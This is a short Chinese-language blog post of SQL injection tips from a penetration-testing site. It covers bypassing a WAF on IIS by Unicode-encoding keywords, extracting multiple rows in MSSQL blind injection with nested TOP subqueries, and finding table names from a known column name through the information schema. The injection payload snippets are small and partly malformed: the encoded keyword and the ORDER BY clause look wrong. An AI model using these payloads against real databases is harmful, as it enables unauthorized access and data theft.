SQL注入的一些Tips[持续更新]


IIS下绕过WAF(在同事那里偷来的):

IIS会对Unicode编码进行自动解码,所以在IIS环境下可以将关键字进行Unicode编码进行绕过。

demo:

select * from user where id = 1 => 拦截
sel%u00065ct * from user where id = 1 => 不拦截
//原理:将E进行unicode编码了一次

ascii and mssql盲注取多行数据:

使用子查询嵌套top。然后使用desc排序进行反转来打到将最后一个值变为第一个值,之后递减嵌套top中的值

demo:

and 1 = (select top 1 {columns} from [user].dbo.[user] where {columns} in (select top 10 {columns} from [user].dbo.[user]) order by desc [columns])

MYSQL与MSSQL高版本未知表明知道列明的情况下快速定位出表名

根据information.columns表结构:

1560952496-964082-image.png

其中存在tablename与columnname两个字段

执行:

select table_name from information.columns where column_name='xxx'

就可以得到存在这个列的所有表面,在根据表前缀即可定位出表名:

1560952496-964082-image.png

声明:小透明 | 渗透测试,代码审计,Web安全|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接 - SQL注入的一些Tips[持续更新]


emmmmmmmmmmm............